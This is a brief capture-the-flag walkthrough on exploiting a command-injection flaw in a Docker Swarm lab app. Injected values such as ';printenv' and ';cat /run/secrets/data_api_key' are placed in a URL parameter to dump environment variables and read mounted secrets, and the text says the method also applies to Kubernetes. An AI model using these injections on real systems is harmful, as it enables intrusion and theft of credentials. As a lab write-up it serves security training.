Exploiting Cluster Secrets

  • The application running in the CTF VM has code execution vulnerability http://CTFVMIP:8080/?domain=;id and is running in docker swarm as service with attached secrets

accessing the docker swarm app

  • We can access the application container's environment variables using the printenv command by visiting http://CTFVMIP:8080/?domain=;printenv

access docker swarm environment variables

  • We can explore the directories further http://CTFVMIP:8080/?domain=;ls -l /run/

docker swarm app search locations

  • The secrets are mounted via docker secrets at /var/run/ or /run/. We can access them by visiting http://CTFVMIP:8080/?domain=;cat /run/secrets/data_api_key

docker secret access data

  • A similar approach can be user for docker swarm and kubernetes cluster environments